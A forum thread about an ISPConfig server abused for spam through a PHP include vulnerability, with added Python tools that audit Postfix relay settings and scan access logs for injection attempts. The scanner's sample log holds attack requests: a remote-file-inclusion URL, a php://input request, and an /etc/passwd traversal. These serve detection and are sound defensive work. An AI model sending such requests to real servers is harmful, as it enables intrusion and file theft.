HowtoForge Forums > Linux Forums > Server Operation

#1  19th December 2010, 08:42
Mehumaija, Junior Member (Join Date: Sep 2008, Posts: 5)

ISPConfig 3 – spam attack

Hello,

I recently set up an ISPConfig 3 box (been running ISPConfig 2 successfully for years). The new box was set up on Ubuntu 10.04.1 LTS using the perfect server instructions (to the best of my abilities).

However, the new machine is now being used as a spam relay. The attacker has guessed a local username (webXX@example.com) and is using that successfully as a sender address.

The server needs to accept incoming mail for the customer domains, but all real clients should authenticate themselves via SMTP auth.

What would be the usual suspects in the Postfix configuration I should be looking at?

Thanks!
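The requirement in post #1 (accept mail for the hosted domains, relay only for authenticated clients) maps onto Postfix's smtpd_recipient_restrictions list. The check below is an added example, not code from the thread or from ISPConfig: it parses main.cf syntax, including continuation lines, and reports the two ways that policy is usually broken, a mynetworks entry that trusts every address, and a restriction list that never reaches reject_unauth_destination (or puts an unconditional permit in front of it). Both configuration snippets are constructed for the example.

```python
"""Relay-policy check for a Postfix main.cf (added example, not from the thread).

Post #1 wants the box to accept mail for its own domains while anyone else
must authenticate. In Postfix that is the smtpd_recipient_restrictions
list: permit_mynetworks and permit_sasl_authenticated may come first, but
reject_unauth_destination must follow them, and nothing unconditional may
sit in front of it. Both snippets below are constructed, not taken from a
real server.
"""
import ipaddress
import re

STOP_RULES = {"reject_unauth_destination", "defer_unauth_destination"}


def parse_main_cf(text):
    """Return {parameter: value} from main.cf text, joining continuation lines."""
    params = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and current is not None:
            params[current] += " " + raw.strip()   # continuation of previous value
            continue
        key, sep, value = raw.partition("=")
        if not sep:
            continue                               # not a parameter line
        current = key.strip()
        params[current] = value.strip()
    return params


def split_list(value):
    """Postfix lists are separated by commas and/or whitespace."""
    return [item for item in re.split(r"[,\s]+", value) if item]


def check_relay_policy(text):
    """Return a list of findings; an empty list means the relay policy looks sound."""
    params = parse_main_cf(text)
    findings = []

    # 1. mynetworks: every network listed here may relay without authentication.
    for entry in split_list(params.get("mynetworks", "")):
        try:
            net = ipaddress.ip_network(entry.replace("[", "").replace("]", ""), strict=False)
        except ValueError:
            continue                               # table lookups, $variables, hostnames
        if net.prefixlen == 0:
            findings.append(f"mynetworks trusts the whole Internet: {entry}")

    # 2. smtpd_recipient_restrictions: must reach reject_unauth_destination
    #    before any unconditional permit.
    rules = split_list(params.get("smtpd_recipient_restrictions", ""))
    stop_at = next((i for i, r in enumerate(rules) if r in STOP_RULES), None)
    if stop_at is None:
        findings.append("smtpd_recipient_restrictions lacks reject_unauth_destination (open relay)")
    elif "permit" in rules[:stop_at]:
        findings.append("unconditional 'permit' precedes reject_unauth_destination (open relay)")
    return findings


# Constructed: how the relay policy often ends up after hand edits.
WEAK_MAIN_CF = """\
mynetworks = 127.0.0.0/8 [::1]/128 0.0.0.0/0
smtpd_sasl_auth_enable = yes
smtpd_recipient_restrictions = permit_mynetworks,
    permit_sasl_authenticated,
    permit
"""

# Constructed: the same box with the policy post #1 describes.
FIXED_MAIN_CF = """\
mynetworks = 127.0.0.0/8 [::1]/128
smtpd_sasl_auth_enable = yes
smtpd_recipient_restrictions = permit_mynetworks,
    permit_sasl_authenticated,
    reject_unauth_destination
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_MAIN_CF), ("fixed", FIXED_MAIN_CF)):
        print(name, check_relay_policy(cfg) or ["ok"])
```

On a live box the text to feed in is the output of `postconf -n`. Postfix 2.10 and later evaluate smtpd_relay_restrictions before smtpd_recipient_restrictions, so on newer releases the same rule should be applied to that parameter as well.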
#2  19th December 2010, 10:29
Mehumaija, Junior Member (Join Date: Sep 2008, Posts: 5)

Found it

OK, apparently the culprit is a vulnerable PHP application on one of the accounts, so Postfix is not at fault.

So, a related question: if a SuPHP account was compromised via a script vulnerability, what is the risk that the attacker has gained wider access (beyond just the infected account)?
#3  19th December 2010, 11:25
till, Super Moderator (Join Date: Apr 2005, Location: Lüneburg, Germany, Posts: 36,405)

It is unlikely that the attacker gained wider access when you install Linux updates regularly. Also, most of these attacks were done by automatic scripts which are only made to send spam, so they do not even try to attack the system behind the webspace.

Nevertheless, you should scan the system with rkhunter.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
#4  19th December 2010, 11:58
Mehumaija, Junior Member (Join Date: Sep 2008, Posts: 5)

Intrusion method

Upon further investigation, it seems that the injection method is the one described here:

http://www.ivankristianto.com/hackin...anto-com/1503/

I have modified the offending script with the include vulnerability, and I am currently investigating how to prevent similar injections in the future (beyond reviewing all customer PHP code).
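Post #4 traced the break-in to a PHP script with an include vulnerability and asks how to catch the next one without auditing every customer's code. One place such attempts leave a trace is the Apache access log: a parameter that is handed to include() gets called with a remote URL, a PHP stream wrapper, or a directory-traversal path. The scanner below is an added example, not code from the thread or from ISPConfig; the log lines, client addresses and parameter names (page, img) are constructed for it.

```python
"""Flag include-style injection attempts in an Apache access log.

Added example, not the thread author's code. Requests that abuse a PHP
include() taking user input carry a parameter whose value is a remote URL,
a PHP stream wrapper, or a directory-traversal path, so the access log
shows them even after the vulnerable script has been fixed. The log lines
and the parameter names (page, img) are constructed for this example.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format, up to the response size (referer/agent ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is (regex on the decoded parameter value, human-readable reason).
RULES = [
    (re.compile(r"^(https?|ftp)://", re.I), "remote URL in parameter"),
    (re.compile(r"^(php|data|expect|phar)://", re.I), "PHP stream wrapper in parameter"),
    (re.compile(r"(^|[\\/])\.\.([\\/]|$)"), "directory traversal in parameter"),
]


def classify_value(value):
    """Return the first matching reason for a parameter value, or None."""
    for pattern, reason in RULES:
        if pattern.search(value):
            return reason
    return None


def scan_access_log(lines):
    """Return one finding per suspicious parameter: ip, path, param, value, reason."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                   # not a request line we understand
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so encoded forms of the same value are caught too
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                findings.append({"ip": m.group("ip"), "path": parts.path,
                                 "param": param, "value": value, "reason": reason})
    return findings


def offenders(findings):
    """Count findings per client address, most active first."""
    return Counter(f["ip"] for f in findings)


# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Dec/2010:08:40:12 +0200] "GET /index.php?page=home HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Dec/2010:08:40:13 +0200] "GET /index.php?page=http://198.51.100.7/inc.txt? HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Dec/2010:08:40:14 +0200] "GET /index.php?page=php://input HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Dec/2010:08:41:02 +0200] "GET /gallery.php?img=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1440 "-" "curl/7.21.0"
192.0.2.44 - - [19/Dec/2010:08:42:30 +0200] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["ip"]} {h["path"]} {h["param"]}={h["value"]!r}: {h["reason"]}')
    print(offenders(hits).most_common())
```

Run it over the per-site access logs that ISPConfig writes for each web account and the findings point at both the script that needs fixing and the client addresses to block. The remote-URL class is also switched off at the PHP level by `allow_url_include = Off`, and a per-site `open_basedir` limits what a traversal path can reach; neither replaces fixing the script, but both contain the damage while the code is being reviewed.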